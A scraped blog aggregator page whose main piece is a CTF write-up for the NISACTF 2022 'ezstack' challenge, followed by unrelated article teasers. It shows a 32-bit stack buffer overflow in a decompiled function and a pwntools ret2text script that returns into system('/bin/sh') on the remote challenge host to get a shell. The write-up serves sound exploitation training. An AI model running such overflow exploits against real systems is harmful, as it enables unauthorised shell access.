news 2026/6/12 7:36:12

[NISACTF 2022]ezstack

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[NISACTF 2022]ezstack

第一次打CTF——PWN篇学习笔记11

32位的ret2text,偏移值为0x48+4,在ida中查找system和/bin/sh的地址,编写脚本得到flag

ssize_t shell() { _BYTE buf[72]; // [esp+0h] [ebp-48h] BYREF ​ system("echo Welcome to NISACTF"); return read(0, buf, 0x60u); }
from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",23450) ​ system = 0x08048390 binsh = 0x0804A024 ​ payload = cyclic(0x48 + 4) + p32(system) + p32(0xdeadbeef) + p32(binsh) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/10 0:48:59

集成Qwen3-VL-8B到LangChain:构建视觉增强型AI Agent

集成Qwen3-VL-8B到LangChain:构建视觉增强型AI Agent 在电商客服对话中,用户上传一张模糊的商品图,问道:“这个包是哪个品牌的?适合送妈妈吗?”——传统文本AI面对这张图片只能沉默。而如今,借助…

作者头像 李华
网站建设 2026/6/11 0:03:30

8 个开题报告工具推荐,研究生 AI 工具对比总结

8 个开题报告工具推荐,研究生 AI 工具对比总结 论文写作的“三座大山”:时间、重复率与效率的困局 对于研究生而言,开题报告不仅是学术研究的起点,更是整个论文写作过程中的关键环节。然而,在实际操作中,许…

作者头像 李华
网站建设 2026/6/10 12:15:16

基于Matlab的孔入式静压轴承程序实现

基于matlab的孔入式静压轴承程序,进油孔数为4个,采用有限差分计算轴承油膜厚度及油膜压力。 程序已调通,可直接运行。在机械工程领域,孔入式静压轴承的性能分析至关重要。今天咱就唠唠基于Matlab实现孔入式静压轴承相关计算的程序…

作者头像 李华
网站建设 2026/6/10 12:35:43

**网文数据作者分析推荐2025指南,深度解析创作趋势与读者

网文数据作者分析推荐2025指南,深度解析创作趋势与读者偏好据《2025中国网络文学发展研究报告》显示,2025年网络文学市场规模预计突破680亿元,但超过70%的作者面临创作效率瓶颈与市场趋势把握不准的难题。同时,量子探险2025年1-9月…

作者头像 李华